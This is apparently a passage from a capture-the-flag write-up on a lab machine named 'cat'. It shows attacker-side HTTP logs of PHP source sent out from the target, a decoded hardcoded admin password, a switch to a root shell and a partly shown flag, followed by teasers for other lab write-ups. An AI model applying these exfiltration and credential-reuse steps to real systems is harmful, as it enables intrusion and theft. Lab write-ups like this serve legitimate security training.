10.10.11.53 - - [04/Feb/2025 00:09:46] "GET /?response=%3C%3Fphp%0A%24valid_username%20%3D%20%27admin%27%3B%0A%24valid_password%20%3D%20%27IKw75eR0MR7CMIxhH0%27%3B%0A%0Aif%20(!isset(%24_SERVER%5B%27PHP_AUTH_USER%27%5D)%20%7C%7C%20!isset(%24_SERVER%5B%27PHP_AUTH_PW%27%5D)%20%7C%7C%20%0A%20%20%20%20%24_SERVER%5B%27PHP_AUTH_USER%27%5D%20!%3D%20%24valid_username%20%7C%7C%20%24_SERVER%5B%27PHP_AUTH_PW%27%5D%20!%3D%20%24valid_password)%20%7B%0A%20%20%20%20%0A%20%20%20%20header(%27WWW-Authenticate%3A%20Basic%20realm%3D%22Employee%20Management%22%27)%3B%0A%20%20%20%20header(%27HTTP%2F1.0%20401%20Unauthorized%27)%3B%0A%20%20%20%20exit%3B%0A%7D%0A%0Aheader(%27Location%3A%20dashboard.php%27)%3B%0Aexit%3B%0A%3F%3E%0A%0A HTTP/1.1" 200 -
10.10.11.53 - - [04/Feb/2025 00:09:57] "GET /?response=%3C%3Fphp%0A%24valid_username%20%3D%20%27admin%27%3B%0A%24valid_password%20%3D%20%27IKw75eR0MR7CMIxhH0%27%3B%0A%0Aif%20(!isset(%24_SERVER%5B%27PHP_AUTH_USER%27%5D)%20%7C%7C%20!isset(%24_SERVER%5B%27PHP_AUTH_PW%27%5D)%20%7C%7C%20%0A%20%20%20%20%24_SERVER%5B%27PHP_AUTH_USER%27%5D%20!%3D%20%24valid_username%20%7C%7C%20%24_SERVER%5B%27PHP_AUTH_PW%27%5D%20!%3D%20%24valid_password)%20%7B%0A%20%20%20%20%0A%20%20%20%20header(%27WWW-Authenticate%3A%20Basic%20realm%3D%22Employee%20Management%22%27)%3B%0A%20%20%20%20header(%27HTTP%2F1.0%20401%20Unauthorized%27)%3B%0A%20%20%20%20exit%3B%0A%7D%0A%0Aheader(%27Location%3A%20dashboard.php%27)%3B%0Aexit%3B%0A%3F%3E%0A%0A HTTP/1.1" 200 -- using cyberchef to url-decode
sh
10.10.11.53 - - [04/Feb/2025 00:09:57] "GET /?response=<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';
if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) ||
$_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {
header('WWW-Authenticate: Basic realm="Employee Management"');
header('HTTP/1.0 401 Unauthorized');
exit;
}
header('Location: dashboard.php');
exit;
?>
HTTP/1.1" 200 -creds
admin:IKw75eR0MR7CMIxhH0
sh
axel@cat:~$ su root
Password:
root@cat:/home/axel# whoami
rootroot.txt
sh
root@cat:~# cat root.txt
d611b028...Up next
EasyFeb 2025
VHL — Techblog
WordPress 4.7.2 on CentOS. Exploited outdated plugin for remote code execution and escalated via sudo misconfiguration.
Read writeup
EasyFeb 2025
VHL — Backupadmin
FTP server with anonymous access exposes backup credentials. Password reuse leads to SSH login and privilege escalation.
Read writeup
EasyFeb 2025
VHL — Web01-Dev
Development web server with FTP credentials leaked via anonymous login. Credential reuse and web shell upload for root.
Read writeup